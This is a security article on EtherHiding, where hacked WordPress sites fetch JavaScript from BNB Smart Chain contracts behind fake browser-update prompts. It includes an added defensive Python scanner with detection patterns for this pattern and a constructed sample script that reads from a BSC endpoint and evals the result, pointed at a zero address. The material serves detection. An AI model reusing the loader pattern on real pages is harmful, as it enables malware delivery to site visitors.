Understanding EtherHiding: The New Threat Vector
Security experts at 0xScope and CertiK have observed a rising trend among cybercriminals utilizing BNB Smart Chain contracts. Despite its name, EtherHiding, a technique for concealing malicious code within blockchain smart contracts, is primarily associated with Binance’s BNB Smart Chain rather than Ethereum. This strategy is favored by hackers due to its cost-effectiveness and perceived lower security.
BNB Smart Chain’s Appeal to Cybercriminals
BNB Smart Chain’s affordability is a significant factor attracting cybercriminals. According to Joe Green, a security researcher at CertiK, the lower handling fees on BNB Smart Chain, in comparison to Ethereum, make it an attractive choice for executing EtherHiding attacks. Network stability and speed remain consistent, and because updating the JavaScript payload stored on-chain is inexpensive, the attackers face minimal financial pressure.
Execution of EtherHiding Attacks
EtherHiding attacks commence with hackers compromising WordPress websites. Malicious code is injected into the site, and that code retrieves partial payloads concealed within Binance smart contracts. The website’s front end is replaced with a counterfeit browser update prompt. When clicked, this prompt pulls the JavaScript payload from the Binance blockchain, allowing hackers to distribute malware disguised as browser updates. To avoid detection, hackers frequently alter the malware payloads and rotate website domains, ensuring users unknowingly download fresh malware.
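The chain of events above has a recognisable footprint in a compromised page’s source: a JSON-RPC `eth_call` against a BNB Smart Chain endpoint, a decoder that turns the returned hex into a string, an execution sink such as `eval`, and a fake browser-update lure. The following heuristic scanner is an added example for defenders reviewing WordPress page sources or proxy captures; it is not code from the article or from 0xScope or CertiK. The RPC host patterns are an assumption based on commonly published BSC public endpoint names, and the three sample pages are constructed for the example (the "suspicious" one contains no real payload).

```python
"""Heuristic scanner for the EtherHiding page pattern: JavaScript that reads a
payload from a BNB Smart Chain contract via eth_call and executes the result
or injects a browser-update lure. Added example, not the article's own code."""
import re

# Indicator categories with weights. The RPC host patterns are an assumption
# (commonly published BSC public endpoint names), not taken from the article.
INDICATORS = {
    "bsc_rpc_endpoint": (2, [r"bsc-dataseed[\w.-]*\.binance\.org", r"bsc[\w.-]*\.bnbchain\.org"]),
    "jsonrpc_eth_call": (2, [r"[\"']eth_call[\"']"]),
    "chain_id_bsc":     (1, [r"(?:chainId|chain_id)\W{0,5}(?:56|0x38)\b"]),
    "string_decoder":   (1, [r"String\.fromCharCode", r"\batob\s*\(", r"hexToString|toUtf8String"]),
    "exec_sink":        (2, [r"\beval\s*\(", r"new\s+Function\s*\(", r"document\.write\s*\(", r"\.innerHTML\s*="]),
    "update_lure":      (2, [r"update\s+your\s+browser", r"browser\s+update", r"chrome\s+is\s+out\s+of\s+date"]),
}


def find_indicators(source: str) -> dict:
    """Return {category: [matched snippets]} for every category that fires."""
    hits = {}
    for category, (_weight, patterns) in INDICATORS.items():
        matches = []
        for pattern in patterns:
            matches.extend(m.group(0) for m in re.finditer(pattern, source, re.IGNORECASE))
        if matches:
            hits[category] = matches
    return hits


def classify(source: str) -> dict:
    """Score a page. 'high' needs the core combination the article describes:
    chain read (RPC endpoint or eth_call) feeding an execution sink."""
    hits = find_indicators(source)
    score = sum(INDICATORS[c][0] for c in hits)
    chain_read = "bsc_rpc_endpoint" in hits or "jsonrpc_eth_call" in hits
    if chain_read and "exec_sink" in hits:
        verdict = "high"
    elif score >= 3:
        verdict = "medium"   # web3 activity or a lure alone: worth a manual look
    else:
        verdict = "low"
    return {"verdict": verdict, "score": score, "hits": hits}


# Constructed sample 1: the EtherHiding shape (zero address, dummy calldata, no real payload).
SUSPICIOUS_PAGE = """
<script>
  var rpc = "https://bsc-dataseed.binance.org/";
  var body = {jsonrpc:"2.0", id:1, method:"eth_call",
              params:[{to:"0x0000000000000000000000000000000000000000", data:"0x00000000"}, "latest"]};
  fetch(rpc, {method:"POST", body: JSON.stringify(body)})
    .then(r => r.json()).then(j => { var code = hexToString(j.result); eval(code); });
</script>
"""

# Constructed sample 2: a legitimate dapp widget that reads a balance and renders text only.
BENIGN_DAPP_PAGE = """
<script>
  const provider = { url: "https://bsc-dataseed1.bnbchain.org", chainId: 56 };
  const req = { jsonrpc: "2.0", id: 7, method: "eth_call", params: [{to: TOKEN, data: CALLDATA}, "latest"] };
  fetch(provider.url, {method: "POST", body: JSON.stringify(req)})
    .then(r => r.json()).then(j => { document.getElementById("bal").textContent = j.result; });
</script>
"""

# Constructed sample 3: no web3 and no lure at all.
PLAIN_PAGE = "<p>Welcome to our bakery. Opening hours 9-5.</p>"

if __name__ == "__main__":
    for name, page in [("suspicious", SUSPICIOUS_PAGE), ("dapp", BENIGN_DAPP_PAGE), ("plain", PLAIN_PAGE)]:
        result = classify(page)
        print(f"{name}: {result['verdict']} (score {result['score']}) {sorted(result['hits'])}")
```

The scoring deliberately separates ordinary web3 activity (an `eth_call` that renders a balance) from the attack shape, where the chain read feeds an execution sink; the "medium" tier exists so that a lure or an on-chain read on a site that should have neither still gets a human look.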
Factors Influencing the Choice of BNB Smart Chain
Security researchers at Web3 analytics firm 0xScope speculate that the preference for BNB Smart Chain could be attributed to heightened security scrutiny on Ethereum. Injecting malicious code using Ethereum carries higher risks of detection due to systems like Infura’s IP address tracking for MetaMask transactions. By utilizing BNB Smart Chain, hackers can operate with reduced scrutiny and continue their malicious activities.
Complexity of EtherHiding Attacks
The sophistication of EtherHiding attacks is evident in the constant updates made across 18 identified hacker domains. Hackers strategically link key addresses to entities like NFT marketplace OpenSea users and Copper custody services. This intricate web of connections, coupled with daily payload updates, makes EtherHiding incredibly challenging to detect and halt, and therefore a potent threat in the realm of cybersecurity.